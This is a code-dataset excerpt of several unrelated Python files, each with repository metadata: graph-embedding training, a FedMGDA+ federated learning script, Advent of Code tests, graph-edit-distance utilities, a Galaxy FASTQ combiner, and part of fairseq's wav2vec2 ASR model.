gamma=args.gamma,
target_patch_degree=args.target_patch_degree,
verbose=args.verbose)
if args.verbose:
print(f'total edges: {data.num_edges}')
print(f'total patch edges: {sum(c.num_edges for c in patch_data)}')
if args.no_features:
data.x = speye(data.num_nodes)
baseline_file = output_folder / f'{basename}_full_info.json'
training_args = {'lr': args.lr, 'num_epochs': args.num_epochs, 'hidden_multiplier': args.hidden_multiplier}
if baseline_file.is_file():
baseline_data = ResultsDict.load(baseline_file)
else:
baseline_data = ResultsDict()
for d in dims:
r = baseline_data.runs(d)
if r < runs:
if args.verbose:
print(f'training full model for {runs-r} runs and d={d}')
for r_it in range(r, runs):
if args.verbose:
print(f"full model (d={d}) run {r_it + 1} of {runs}")
data = data.to(args.device)
model = train(data,
VGAE_model(d, d * args.hidden_multiplier, data.num_features, dist=args.dist).to(args.device),
loss_fun=VGAE_loss,
num_epochs=num_epochs,
lr=args.lr,
verbose=args.verbose,
)
coords = embedding(model, data)
auc = reconstruction_auc(coords, data, dist=args.dist)
if auc > baseline_data.max_auc(d):
if args.verbose:
print(f"new best (auc={auc})")
torch.save(model.state_dict(), output_folder / f'{basename}_full_d{d}_best_model.pt')
torch.save(coords, output_folder / f'{basename}_full_d{d}_best_coords.pt')
baseline_data.update_dim(d, [auc], training_args)
baseline_data.save(baseline_file)
results_file = patch_folder / f'{basename}_l2g_info.json'
nt_results_file = patch_folder / f'{basename}_nt_info.json'
if results_file.is_file():
results = ResultsDict.load(results_file, replace=True)
else:
results = ResultsDict(replace=True)
if nt_results_file.is_file():
nt_results = ResultsDict.load(nt_results_file, replace=True)
else:
nt_results = ResultsDict(replace=True)
for d in dims:
patch_list = []
update_aligned_embedding = False
for p_ind, patch in enumerate(patch_data):
patch_result_file = patch_folder / f'{basename}_patch{p_ind}_info.json'
if patch_result_file.is_file():
patch_results = ResultsDict.load(patch_result_file)
else:
patch_results = ResultsDict()
coords_file = patch_folder / f'{basename}_patch{p_ind}_d{d}_best_coords.pt'
if coords_file.is_file():
best_coords = torch.load(coords_file)
r = patch_results.runs(d)
if args.no_features:
patch.x = speye(patch.num_nodes)
if r < runs:
if args.verbose:
print(f'training patch{p_ind} for {runs-r} runs and d={d}')
patch = patch.to(args.device)
for r_it in range(r, runs):
if args.verbose:
print(f"patch{p_ind} (d={d}) run {r_it+1} of {runs}")
model = train(patch,
VGAE_model(d, d * args.hidden_multiplier, patch.num_features, dist=args.dist).to(args.device),
loss_fun=VGAE_loss,
num_epochs=num_epochs,
lr=args.lr,
)
coords = embedding(model, patch)
auc = reconstruction_auc(coords, patch, dist=args.dist)
if auc > patch_results.max_auc(d):
if args.verbose:
print(f"new best (auc={auc})")
best_coords = coords
torch.save(model.state_dict(), patch_folder / f'{basename}_patch{p_ind}_d{d}_best_model.pt')
torch.save(best_coords, coords_file)
update_aligned_embedding = True
patch_results.update_dim(d, [auc], training_args)
patch_results.save(patch_result_file)
patch_list.append(l2g.Patch(patch.nodes.cpu().numpy(), best_coords.cpu().numpy()))
patched_embedding_file = patch_folder / f'{basename}_d{d}_coords.pt'
patched_embedding_file_nt = patch_folder / f'{basename}_d{d}_ntcoords.pt'
if update_aligned_embedding or not patched_embedding_file.is_file():
prob = l2g.WeightedAlignmentProblem(patch_list, patch_edges=patch_graph.edges())
ntcoords = prob.mean_embedding()
coords = prob.get_aligned_embedding()
torch.save(coords, patched_embedding_file)
torch.save(ntcoords, patched_embedding_file_nt)
results.update_dim(d, [reconstruction_auc(torch.as_tensor(coords), data, neg_edges, dist=args.dist)])
nt_results.update_dim(d, [reconstruction_auc(torch.as_tensor(ntcoords), data, neg_edges, dist=args.dist)])
results.save(results_file)
nt_results.save(nt_results_file)
baseline_data = baseline_data.reduce_to_dims(dims)
results = results.reduce_to_dims(dims)
nt_results = nt_results.reduce_to_dims(dims)
if args.plot:
plt.figure()
plt.plot(dims, [max(v) for v in baseline_data['auc']], label='full, inner product', marker='o',
color='tab:blue')
plt.plot(dims, results['auc'], '--', label='l2g, inner product', marker='>', color='tab:blue')
plt.plot(dims, nt_results['auc'], ':', label='no-trans, inner product', color='tab:blue',
linewidth=1)
plt.xscale('log')
plt.xticks(dims, dims)
plt.minorticks_off()
plt.xlabel('embedding dimension')
plt.ylabel('AUC')
plt.legend()
oversampling_ratio = sum(p.num_edges for p in patch_data) / data.num_edges
plt.title(f"oversampling ratio: {oversampling_ratio:.2}, #patches: {len(patch_data)}")
plt.savefig(output_folder / f"{basename}_{cluster_string}_{sp_string}_mo{min_overlap}_to{target_overlap}.pdf")
plt.show()
if __name__ == '__main__':
args = _parser.parse_args()
run(**vars(args))
| true
| true
|
790b08bb6917d38a656b112ba98748029b3f9856
| 5,030
|
py
|
Python
|
fedlab_benchmarks/fedmgda+/standalone.py
|
KarhouTam/FedLab-benchmarks
|
6de0ca56f645794ca7eae0f19c6b0117165d3404
|
[
"Apache-2.0"
] | null | null | null |
fedlab_benchmarks/fedmgda+/standalone.py
|
KarhouTam/FedLab-benchmarks
|
6de0ca56f645794ca7eae0f19c6b0117165d3404
|
[
"Apache-2.0"
] | null | null | null |
fedlab_benchmarks/fedmgda+/standalone.py
|
KarhouTam/FedLab-benchmarks
|
6de0ca56f645794ca7eae0f19c6b0117165d3404
|
[
"Apache-2.0"
] | null | null | null |
from json import load
import os
import argparse
import random
from copy import deepcopy
import torchvision
import torchvision.transforms as transforms
from torch import nn
import sys
import torch
import numpy as np
import cvxopt
torch.manual_seed(0)
from fedlab.core.client.serial_trainer import SubsetSerialTrainer
from fedlab.utils.aggregator import Aggregators
from fedlab.utils.serialization import SerializationTool
from fedlab.utils.functional import evaluate
from fedlab.utils.functional import get_best_gpu, load_dict
sys.path.append("../")
from models.cnn import CNN_MNIST
def quadprog(Q, q, G, h, A, b):
"""
Input: Numpy arrays, the format follows MATLAB quadprog function: https://www.mathworks.com/help/optim/ug/quadprog.html
Output: Numpy array of the solution
"""
Q = cvxopt.matrix(Q.tolist())
q = cvxopt.matrix(q.tolist(), tc='d')
G = cvxopt.matrix(G.tolist())
h = cvxopt.matrix(h.tolist())
A = cvxopt.matrix(A.tolist())
b = cvxopt.matrix(b.tolist(), tc='d')
sol = cvxopt.solvers.qp(Q, q.T, G.T, h.T, A.T, b)
return np.array(sol['x'])
def optim_lambdas(gradients, lambda0):
epsilon = 0.5
n = len(gradients)
J_t = [grad.numpy() for grad in gradients]
J_t = np.array(J_t)
# target function
Q = 2 * np.dot(J_t, J_t.T)
q = np.array([[0] for i in range(n)])
# equality constrint
A = np.ones(n).T
b = np.array([1])
# boundary
lb = np.array([max(0, lambda0[i] - epsilon) for i in range(n)])
ub = np.array([min(1, lambda0[i] + epsilon) for i in range(n)])
G = np.zeros((2 * n, n))
for i in range(n):
G[i][i] = -1
G[n + i][i] = 1
h = np.zeros((2 * n, 1))
for i in range(n):
h[i] = -lb[i]
h[n + i] = ub[i]
res = quadprog(Q, q, G, h, A, b)
return res
# python standalone.py --sample_ratio 0.1 --batch_size 10 --epochs 5 --partition iid
# configuration
parser = argparse.ArgumentParser(description="Standalone training example")
parser.add_argument("--total_client", type=int, default=10)
parser.add_argument("--com_round", type=int, default=5)
parser.add_argument("--sample_ratio", type=float)
parser.add_argument("--batch_size", type=int)
parser.add_argument("--lr", type=float)
parser.add_argument("--epochs", type=int)
args = parser.parse_args()
# get raw dataset
root = "../datasets/mnist/"
trainset = torchvision.datasets.MNIST(root=root,
train=True,
download=True,
transform=transforms.ToTensor())
testset = torchvision.datasets.MNIST(root=root,
train=False,
download=True,
transform=transforms.ToTensor())
test_loader = torch.utils.data.DataLoader(testset,
batch_size=len(testset),
drop_last=False,
shuffle=False)
# setup
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1,2,3"
gpu = get_best_gpu()
model = CNN_MNIST().cuda(gpu)
# FL settings
num_per_round = int(args.total_client * args.sample_ratio)
aggregator = Aggregators.fedavg_aggregate
total_client_num = args.total_client # client总数
data_indices = load_dict("./mnist_noniid.pkl")
# fedlab setup
local_model = deepcopy(model)
trainer = SubsetSerialTrainer(model=local_model,
dataset=trainset,
data_slices=data_indices,
aggregator=aggregator,
args={
"batch_size": args.batch_size,
"epochs": args.epochs,
"lr": args.lr
})
dynamic_lambdas = np.ones(num_per_round) * 1.0 / num_per_round
# train procedure
to_select = [i for i in range(total_client_num)]
for round in range(args.com_round):
model_parameters = SerializationTool.serialize_model(model)
selection = random.sample(to_select, num_per_round)
parameters = trainer.train(model_parameters=model_parameters,
id_list=selection,
aggregate=False)
gradients = [model_parameters - model for model in parameters]
for i, grad in enumerate(gradients):
gradients[i] = grad / grad.norm()
print(len(gradients))
print(gradients[0].shape)
# calculate lamda
lambda0 = [1.0 / num_per_round for _ in range(num_per_round)]
dynamic_lambdas = torch.Tensor(optim_lambdas(gradients, lambda0)).view(-1)
dt = Aggregators.fedavg_aggregate(gradients, dynamic_lambdas)
serialized_parameters = model_parameters - dt * args.lr
SerializationTool.deserialize_model(model, serialized_parameters)
criterion = nn.CrossEntropyLoss()
loss, acc = evaluate(model, criterion, test_loader)
print("loss: {:.4f}, acc: {:.2f}".format(loss, acc))
| 34.689655
| 123
| 0.615706
|
from json import load
import os
import argparse
import random
from copy import deepcopy
import torchvision
import torchvision.transforms as transforms
from torch import nn
import sys
import torch
import numpy as np
import cvxopt
torch.manual_seed(0)
from fedlab.core.client.serial_trainer import SubsetSerialTrainer
from fedlab.utils.aggregator import Aggregators
from fedlab.utils.serialization import SerializationTool
from fedlab.utils.functional import evaluate
from fedlab.utils.functional import get_best_gpu, load_dict
sys.path.append("../")
from models.cnn import CNN_MNIST
def quadprog(Q, q, G, h, A, b):
Q = cvxopt.matrix(Q.tolist())
q = cvxopt.matrix(q.tolist(), tc='d')
G = cvxopt.matrix(G.tolist())
h = cvxopt.matrix(h.tolist())
A = cvxopt.matrix(A.tolist())
b = cvxopt.matrix(b.tolist(), tc='d')
sol = cvxopt.solvers.qp(Q, q.T, G.T, h.T, A.T, b)
return np.array(sol['x'])
def optim_lambdas(gradients, lambda0):
epsilon = 0.5
n = len(gradients)
J_t = [grad.numpy() for grad in gradients]
J_t = np.array(J_t)
Q = 2 * np.dot(J_t, J_t.T)
q = np.array([[0] for i in range(n)])
A = np.ones(n).T
b = np.array([1])
lb = np.array([max(0, lambda0[i] - epsilon) for i in range(n)])
ub = np.array([min(1, lambda0[i] + epsilon) for i in range(n)])
G = np.zeros((2 * n, n))
for i in range(n):
G[i][i] = -1
G[n + i][i] = 1
h = np.zeros((2 * n, 1))
for i in range(n):
h[i] = -lb[i]
h[n + i] = ub[i]
res = quadprog(Q, q, G, h, A, b)
return res
parser = argparse.ArgumentParser(description="Standalone training example")
parser.add_argument("--total_client", type=int, default=10)
parser.add_argument("--com_round", type=int, default=5)
parser.add_argument("--sample_ratio", type=float)
parser.add_argument("--batch_size", type=int)
parser.add_argument("--lr", type=float)
parser.add_argument("--epochs", type=int)
args = parser.parse_args()
root = "../datasets/mnist/"
trainset = torchvision.datasets.MNIST(root=root,
train=True,
download=True,
transform=transforms.ToTensor())
testset = torchvision.datasets.MNIST(root=root,
train=False,
download=True,
transform=transforms.ToTensor())
test_loader = torch.utils.data.DataLoader(testset,
batch_size=len(testset),
drop_last=False,
shuffle=False)
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1,2,3"
gpu = get_best_gpu()
model = CNN_MNIST().cuda(gpu)
num_per_round = int(args.total_client * args.sample_ratio)
aggregator = Aggregators.fedavg_aggregate
total_client_num = args.total_client
data_indices = load_dict("./mnist_noniid.pkl")
local_model = deepcopy(model)
trainer = SubsetSerialTrainer(model=local_model,
dataset=trainset,
data_slices=data_indices,
aggregator=aggregator,
args={
"batch_size": args.batch_size,
"epochs": args.epochs,
"lr": args.lr
})
dynamic_lambdas = np.ones(num_per_round) * 1.0 / num_per_round
to_select = [i for i in range(total_client_num)]
for round in range(args.com_round):
model_parameters = SerializationTool.serialize_model(model)
selection = random.sample(to_select, num_per_round)
parameters = trainer.train(model_parameters=model_parameters,
id_list=selection,
aggregate=False)
gradients = [model_parameters - model for model in parameters]
for i, grad in enumerate(gradients):
gradients[i] = grad / grad.norm()
print(len(gradients))
print(gradients[0].shape)
lambda0 = [1.0 / num_per_round for _ in range(num_per_round)]
dynamic_lambdas = torch.Tensor(optim_lambdas(gradients, lambda0)).view(-1)
dt = Aggregators.fedavg_aggregate(gradients, dynamic_lambdas)
serialized_parameters = model_parameters - dt * args.lr
SerializationTool.deserialize_model(model, serialized_parameters)
criterion = nn.CrossEntropyLoss()
loss, acc = evaluate(model, criterion, test_loader)
print("loss: {:.4f}, acc: {:.2f}".format(loss, acc))
| true
| true
|
790b090b063c370e613c4b73471668b127b66fc5
| 1,354
|
py
|
Python
|
test/test_day17.py
|
frangiz/AdventOfCode2018
|
dffbc0a8467d3c31678d9719923c461b0b12d67f
|
[
"MIT"
] | null | null | null |
test/test_day17.py
|
frangiz/AdventOfCode2018
|
dffbc0a8467d3c31678d9719923c461b0b12d67f
|
[
"MIT"
] | null | null | null |
test/test_day17.py
|
frangiz/AdventOfCode2018
|
dffbc0a8467d3c31678d9719923c461b0b12d67f
|
[
"MIT"
] | null | null | null |
"""The tests for day17."""
from days import day17
from ddt import ddt, data, unpack
import unittest
import helpers
@ddt
class MyTestCase(unittest.TestCase): # noqa D101
@data(
[[
'x=495, y=2..7',
'y=7, x=495..501',
'x=501, y=3..7',
'x=498, y=2..4',
'x=506, y=1..2',
'x=498, y=10..13',
'x=504, y=10..13',
'y=13, x=498..504'], '57'])
@unpack
def test_example_a(self, test_input, expected): # noqa D102
result = day17.part_a(test_input)
self.assertEqual(result, expected)
def test_answer_part_a(self): # noqa D102
result = day17.part_a(helpers.get_file_contents('day17.txt'))
self.assertEqual(result, '38021')
@data(
[[
'x=495, y=2..7',
'y=7, x=495..501',
'x=501, y=3..7',
'x=498, y=2..4',
'x=506, y=1..2',
'x=498, y=10..13',
'x=504, y=10..13',
'y=13, x=498..504'], '29'])
@unpack
def test_example_b(self, test_input, expected): # noqa D102
result = day17.part_b(test_input)
self.assertEqual(result, expected)
def test_answer_part_b(self): # noqa D102
result = day17.part_b(helpers.get_file_contents('day17.txt'))
self.assertEqual(result, '32069')
| 28.808511
| 69
| 0.521418
|
from days import day17
from ddt import ddt, data, unpack
import unittest
import helpers
@ddt
class MyTestCase(unittest.TestCase):
@data(
[[
'x=495, y=2..7',
'y=7, x=495..501',
'x=501, y=3..7',
'x=498, y=2..4',
'x=506, y=1..2',
'x=498, y=10..13',
'x=504, y=10..13',
'y=13, x=498..504'], '57'])
@unpack
def test_example_a(self, test_input, expected):
result = day17.part_a(test_input)
self.assertEqual(result, expected)
def test_answer_part_a(self):
result = day17.part_a(helpers.get_file_contents('day17.txt'))
self.assertEqual(result, '38021')
@data(
[[
'x=495, y=2..7',
'y=7, x=495..501',
'x=501, y=3..7',
'x=498, y=2..4',
'x=506, y=1..2',
'x=498, y=10..13',
'x=504, y=10..13',
'y=13, x=498..504'], '29'])
@unpack
def test_example_b(self, test_input, expected):
result = day17.part_b(test_input)
self.assertEqual(result, expected)
def test_answer_part_b(self):
result = day17.part_b(helpers.get_file_contents('day17.txt'))
self.assertEqual(result, '32069')
| true
| true
|
790b090f6347653937f7ebcfb73826e6f1050b01
| 3,483
|
py
|
Python
|
utils/graph_utils.py
|
BrunoKM/rhoana_graph_tools
|
7150f4bc6337ecf51dd9123cf03561a57d655160
|
[
"MIT"
] | 1
|
2018-08-17T00:12:30.000Z
|
2018-08-17T00:12:30.000Z
|
utils/graph_utils.py
|
BrunoKM/rhoana_graph_tools
|
7150f4bc6337ecf51dd9123cf03561a57d655160
|
[
"MIT"
] | null | null | null |
utils/graph_utils.py
|
BrunoKM/rhoana_graph_tools
|
7150f4bc6337ecf51dd9123cf03561a57d655160
|
[
"MIT"
] | 1
|
2019-05-19T07:08:54.000Z
|
2019-05-19T07:08:54.000Z
|
import numpy as np
import networkx as nx
if __name__ == '__main__':
from ged4py.algorithm import graph_edit_dist
else:
from .ged4py.algorithm import graph_edit_dist
def rearrange_adj_matrix(matrix, ordering):
assert matrix.ndim == 2
# Check that matrix is square
assert matrix.shape[0] == matrix.shape[1]
num_nodes = matrix.shape[0]
assert len(ordering) == num_nodes
# Swap rows into correct ordering
matrix = matrix[ordering, :]
# Swap columns into correct ordering
matrix = matrix[:, ordering]
return matrix
def rand_permute_adj_matrix(matrix):
"""Randomly permute the order of vertices in the adjacency matrix, while maintaining the connectivity
between them."""
num_vertices = matrix.shape[0]
rand_order = np.arange(num_vertices)
np.random.shuffle(rand_order)
matrix_permuted = rearrange_adj_matrix(matrix, rand_order)
return matrix_permuted
def ged_from_adj(adj_mat_1, adj_mat_2, directed=False, ged_function=graph_edit_dist.compare):
"""Calculate the graph edit distance between two graphs"""
if directed:
create_using = nx.DiGraph
else:
create_using = nx.Graph
g1 = nx.from_numpy_matrix(adj_mat_1, create_using=create_using())
g2 = nx.from_numpy_matrix(adj_mat_2, create_using=create_using())
return ged_function(g1, g2)
def ged_from_adj_nx(adj_mat_1, adj_mat_2, directed=False):
"""Calculate the graph edit distance between two graphs using the networkx implementation"""
return ged_from_adj(adj_mat_1, adj_mat_2, directed=directed, ged_function=nx.graph_edit_distance)
def ged_from_adj_ged4py(adj_mat_1, adj_mat_2, directed=False):
"""Calculate the graph edit distance between two graphs using the ged4py implementation"""
return ged_from_adj(adj_mat_1, adj_mat_2, directed=directed, ged_function=graph_edit_dist.compare)
def is_isomorphic_from_adj(adj_mat_1, adj_mat_2):
"""Checks whether two graphs are isomorphic taking adjacency matrices as inputs"""
g1 = nx.from_numpy_matrix(adj_mat_1, create_using=nx.DiGraph())
g2 = nx.from_numpy_matrix(adj_mat_2, create_using=nx.DiGraph())
return nx.is_isomorphic(g1, g2)
def adj_matrix_to_edge_list(adj_matrix, directed=True, first_id=0, weighted=False):
num_nodes = adj_matrix.shape[0]
if directed:
num_edges = np.sum(adj_matrix)
else:
num_edges = int(np.sum(adj_matrix) / 2)
if weighted:
edge_list = np.zeros([num_edges, 3], dtype=np.int32)
else:
edge_list = np.zeros([num_edges, 2], dtype=np.int32)
i = 0
for node_in in range(num_nodes):
if directed:
range_2 = range(num_nodes)
else:
range_2 = range(node_in + 1, num_nodes)
for node_out in range_2:
edge_val = adj_matrix[node_in, node_out]
if edge_val > 0:
# If there is a connection
if weighted:
edge_list[i] = (node_in + first_id, node_out + first_id, edge_val)
else:
edge_list[i] = (node_in + first_id, node_out + first_id)
i += 1
return edge_list
def edge_list_to_textfile(edge_list, filepath, weighted=False):
with open(filepath, 'w') as file:
if weighted:
for i, j, weight in edge_list:
file.write(f"{i} {j} {weight}\n")
else:
for i, j in edge_list:
file.write(f"{i} {j}\n")
return
| 34.147059
| 105
| 0.676715
|
import numpy as np
import networkx as nx
if __name__ == '__main__':
from ged4py.algorithm import graph_edit_dist
else:
from .ged4py.algorithm import graph_edit_dist
def rearrange_adj_matrix(matrix, ordering):
assert matrix.ndim == 2
assert matrix.shape[0] == matrix.shape[1]
num_nodes = matrix.shape[0]
assert len(ordering) == num_nodes
matrix = matrix[ordering, :]
matrix = matrix[:, ordering]
return matrix
def rand_permute_adj_matrix(matrix):
num_vertices = matrix.shape[0]
rand_order = np.arange(num_vertices)
np.random.shuffle(rand_order)
matrix_permuted = rearrange_adj_matrix(matrix, rand_order)
return matrix_permuted
def ged_from_adj(adj_mat_1, adj_mat_2, directed=False, ged_function=graph_edit_dist.compare):
if directed:
create_using = nx.DiGraph
else:
create_using = nx.Graph
g1 = nx.from_numpy_matrix(adj_mat_1, create_using=create_using())
g2 = nx.from_numpy_matrix(adj_mat_2, create_using=create_using())
return ged_function(g1, g2)
def ged_from_adj_nx(adj_mat_1, adj_mat_2, directed=False):
return ged_from_adj(adj_mat_1, adj_mat_2, directed=directed, ged_function=nx.graph_edit_distance)
def ged_from_adj_ged4py(adj_mat_1, adj_mat_2, directed=False):
return ged_from_adj(adj_mat_1, adj_mat_2, directed=directed, ged_function=graph_edit_dist.compare)
def is_isomorphic_from_adj(adj_mat_1, adj_mat_2):
g1 = nx.from_numpy_matrix(adj_mat_1, create_using=nx.DiGraph())
g2 = nx.from_numpy_matrix(adj_mat_2, create_using=nx.DiGraph())
return nx.is_isomorphic(g1, g2)
def adj_matrix_to_edge_list(adj_matrix, directed=True, first_id=0, weighted=False):
num_nodes = adj_matrix.shape[0]
if directed:
num_edges = np.sum(adj_matrix)
else:
num_edges = int(np.sum(adj_matrix) / 2)
if weighted:
edge_list = np.zeros([num_edges, 3], dtype=np.int32)
else:
edge_list = np.zeros([num_edges, 2], dtype=np.int32)
i = 0
for node_in in range(num_nodes):
if directed:
range_2 = range(num_nodes)
else:
range_2 = range(node_in + 1, num_nodes)
for node_out in range_2:
edge_val = adj_matrix[node_in, node_out]
if edge_val > 0:
if weighted:
edge_list[i] = (node_in + first_id, node_out + first_id, edge_val)
else:
edge_list[i] = (node_in + first_id, node_out + first_id)
i += 1
return edge_list
def edge_list_to_textfile(edge_list, filepath, weighted=False):
with open(filepath, 'w') as file:
if weighted:
for i, j, weight in edge_list:
file.write(f"{i} {j} {weight}\n")
else:
for i, j in edge_list:
file.write(f"{i} {j}\n")
return
| true
| true
|
790b096adf0a7dadc6f725ff23f532c4b282732e
| 1,938
|
py
|
Python
|
tools/fastq/fastq_combiner.py
|
bopopescu/phyG
|
023f505b705ab953f502cbc55e90612047867583
|
[
"CC-BY-3.0"
] | 2
|
2016-02-23T00:09:14.000Z
|
2019-02-11T07:48:44.000Z
|
tools/fastq/fastq_combiner.py
|
bopopescu/phyG
|
023f505b705ab953f502cbc55e90612047867583
|
[
"CC-BY-3.0"
] | null | null | null |
tools/fastq/fastq_combiner.py
|
bopopescu/phyG
|
023f505b705ab953f502cbc55e90612047867583
|
[
"CC-BY-3.0"
] | 6
|
2015-05-27T13:09:50.000Z
|
2019-02-11T07:48:46.000Z
|
#Dan Blankenberg
import sys, os, shutil
from galaxy_utils.sequence.fastq import fastqWriter, fastqSequencingRead, fastqCombiner, fastqFakeFastaScoreReader
from galaxy_utils.sequence.fasta import fastaReader, fastaNamedReader
def main():
#Read command line arguments
fasta_filename = sys.argv[1]
fasta_type = sys.argv[2] or 'fasta' #should always be fasta or csfasta? what if txt?
qual_filename = sys.argv[3]
qual_type = sys.argv[4] or 'qualsanger' #qual454 qualsolid
output_filename = sys.argv[5]
force_quality_encoding = sys.argv[6]
if force_quality_encoding == 'None':
force_quality_encoding = None
format = 'sanger'
if fasta_type == 'csfasta' or qual_type == 'qualsolid':
format = 'cssanger'
elif qual_type == 'qualsolexa':
format = 'solexa'
elif qual_type == 'qualillumina':
format = 'illumina'
out = fastqWriter( open( output_filename, 'wb' ), format = format, force_quality_encoding = force_quality_encoding )
if qual_filename == 'None':
qual_input = fastqFakeFastaScoreReader( format, quality_encoding = force_quality_encoding )
else:
qual_input = fastaNamedReader( open( qual_filename, 'rb' ) )
fastq_combiner = fastqCombiner( format )
i = None
skip_count = 0
for i, sequence in enumerate( fastaReader( open( fasta_filename, 'rb' ) ) ):
quality = qual_input.get( sequence )
if quality:
fastq_read = fastq_combiner.combine( sequence, quality )
out.write( fastq_read )
else:
skip_count += 1
out.close()
if i is None:
print "Your file contains no valid FASTA sequences."
else:
print qual_input.has_data()
print 'Combined %s of %s sequences with quality scores (%.2f%%).' % ( i - skip_count + 1, i + 1, float( i - skip_count + 1 ) / float( i + 1 ) * 100.0 )
if __name__ == "__main__":
main()
| 38.76
| 159
| 0.657895
|
import sys, os, shutil
from galaxy_utils.sequence.fastq import fastqWriter, fastqSequencingRead, fastqCombiner, fastqFakeFastaScoreReader
from galaxy_utils.sequence.fasta import fastaReader, fastaNamedReader
def main():
fasta_filename = sys.argv[1]
fasta_type = sys.argv[2] or 'fasta'
qual_filename = sys.argv[3]
qual_type = sys.argv[4] or 'qualsanger'
output_filename = sys.argv[5]
force_quality_encoding = sys.argv[6]
if force_quality_encoding == 'None':
force_quality_encoding = None
format = 'sanger'
if fasta_type == 'csfasta' or qual_type == 'qualsolid':
format = 'cssanger'
elif qual_type == 'qualsolexa':
format = 'solexa'
elif qual_type == 'qualillumina':
format = 'illumina'
out = fastqWriter( open( output_filename, 'wb' ), format = format, force_quality_encoding = force_quality_encoding )
if qual_filename == 'None':
qual_input = fastqFakeFastaScoreReader( format, quality_encoding = force_quality_encoding )
else:
qual_input = fastaNamedReader( open( qual_filename, 'rb' ) )
fastq_combiner = fastqCombiner( format )
i = None
skip_count = 0
for i, sequence in enumerate( fastaReader( open( fasta_filename, 'rb' ) ) ):
quality = qual_input.get( sequence )
if quality:
fastq_read = fastq_combiner.combine( sequence, quality )
out.write( fastq_read )
else:
skip_count += 1
out.close()
if i is None:
print "Your file contains no valid FASTA sequences."
else:
print qual_input.has_data()
print 'Combined %s of %s sequences with quality scores (%.2f%%).' % ( i - skip_count + 1, i + 1, float( i - skip_count + 1 ) / float( i + 1 ) * 100.0 )
if __name__ == "__main__":
main()
| false
| true
|
790b0a8ad1c25e10ce9deea1ce87883a46e7a21f
| 20,506
|
py
|
Python
|
fairseq/models/wav2vec/wav2vec2_asr.py
|
fairseq-FT/fairseq
|
18725499144c1bba7c151b796ba774e59d36eaa9
|
[
"MIT"
] | 33
|
2021-01-06T18:03:55.000Z
|
2022-03-28T12:07:44.000Z
|
fairseq/models/wav2vec/wav2vec2_asr.py
|
fairseq-FT/fairseq
|
18725499144c1bba7c151b796ba774e59d36eaa9
|
[
"MIT"
] | 8
|
2021-06-11T03:11:37.000Z
|
2022-03-08T19:15:42.000Z
|
fairseq/models/wav2vec/wav2vec2_asr.py
|
fairseq-FT/fairseq
|
18725499144c1bba7c151b796ba774e59d36eaa9
|
[
"MIT"
] | 14
|
2021-05-17T06:55:01.000Z
|
2022-03-28T12:07:42.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from argparse import Namespace
import contextlib
import copy
import math
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from dataclasses import dataclass, field
from omegaconf import MISSING, II, open_dict
from typing import Any
from fairseq import checkpoint_utils, tasks, utils
from fairseq.dataclass import FairseqDataclass
from fairseq.dataclass.utils import convert_namespace_to_omegaconf
from fairseq.tasks import FairseqTask
from fairseq.models import (
BaseFairseqModel,
FairseqEncoder,
FairseqEncoderDecoderModel,
FairseqIncrementalDecoder,
register_model,
)
from fairseq.models.wav2vec.wav2vec2 import MASKING_DISTRIBUTION_CHOICES
from fairseq.modules import LayerNorm, PositionalEmbedding, TransformerDecoderLayer
@dataclass
class Wav2Vec2AsrConfig(FairseqDataclass):
w2v_path: str = field(
default=MISSING, metadata={"help": "path to wav2vec 2.0 model"}
)
no_pretrained_weights: bool = field(
default=False, metadata={"help": "if true, does not load pretrained weights"}
)
dropout_input: float = field(
default=0.0,
metadata={"help": "dropout to apply to the input (after feat extr)"},
)
final_dropout: float = field(
default=0.0,
metadata={"help": "dropout after transformer and before final projection"},
)
dropout: float = field(
default=0.0, metadata={"help": "dropout probability inside wav2vec 2.0 model"}
)
attention_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability for attention weights inside wav2vec 2.0 model"
},
)
activation_dropout: float = field(
default=0.0,
metadata={
"help": "dropout probability after activation in FFN inside wav2vec 2.0 model"
},
)
# masking
apply_mask: bool = field(
default=False, metadata={"help": "apply masking during fine-tuning"}
)
mask_length: int = field(
default=10, metadata={"help": "repeat the mask indices multiple times"}
)
mask_prob: float = field(
default=0.5,
metadata={
"help": "probability of replacing a token with mask (normalized by length)"
},
)
mask_selection: MASKING_DISTRIBUTION_CHOICES = field(
default="static", metadata={"help": "how to choose masks"}
)
mask_other: float = field(
default=0,
metadata={
"help": "secondary mask argument (used for more complex distributions), "
"see help in compute_mask_indices"
},
)
no_mask_overlap: bool = field(
default=False, metadata={"help": "whether to allow masks to overlap"}
)
# channel masking
mask_channel_length: int = field(
default=10, metadata={"help": "length of the mask for features (channels)"}
)
mask_channel_prob: float = field(
default=0.0, metadata={"help": "probability of replacing a feature with 0"}
)
mask_channel_selection: MASKING_DISTRIBUTION_CHOICES = field(
default="static",
metadata={"help": "how to choose mask length for channel masking"},
)
mask_channel_other: float = field(
default=0,
metadata={
"help": "secondary mask argument (used for more complex distributions), "
"see help in compute_mask_indicesh"
},
)
no_mask_channel_overlap: bool = field(
default=False, metadata={"help": "whether to allow channel masks to overlap"}
)
freeze_finetune_updates: int = field(
default=0, metadata={"help": "dont finetune wav2vec for this many updates"}
)
feature_grad_mult: float = field(
default=0.0, metadata={"help": "reset feature grad mult in wav2vec 2.0 to this"}
)
layerdrop: float = field(
default=0.0, metadata={"help": "probability of dropping a layer in wav2vec 2.0"}
)
normalize: bool = II("task.normalize")
data: str = II("task.data")
# this holds the loaded wav2vec args
w2v_args: Any = None
@dataclass
class Wav2Vec2CtcConfig(Wav2Vec2AsrConfig):
pass
@register_model("wav2vec_ctc", dataclass=Wav2Vec2CtcConfig)
class Wav2VecCtc(BaseFairseqModel):
def __init__(self, cfg: Wav2Vec2CtcConfig, w2v_encoder: BaseFairseqModel):
super().__init__()
self.cfg = cfg
self.w2v_encoder = w2v_encoder
def upgrade_state_dict_named(self, state_dict, name):
super().upgrade_state_dict_named(state_dict, name)
return state_dict
@classmethod
def build_model(cls, cfg: Wav2Vec2CtcConfig, task: FairseqTask):
"""Build a new model instance."""
w2v_encoder = Wav2VecEncoder(cfg, task.target_dictionary)
return cls(cfg, w2v_encoder)
def get_normalized_probs(self, net_output, log_probs):
"""Get normalized probabilities (or log probs) from a net's output."""
logits = net_output["encoder_out"]
if log_probs:
return utils.log_softmax(logits.float(), dim=-1)
else:
return utils.softmax(logits.float(), dim=-1)
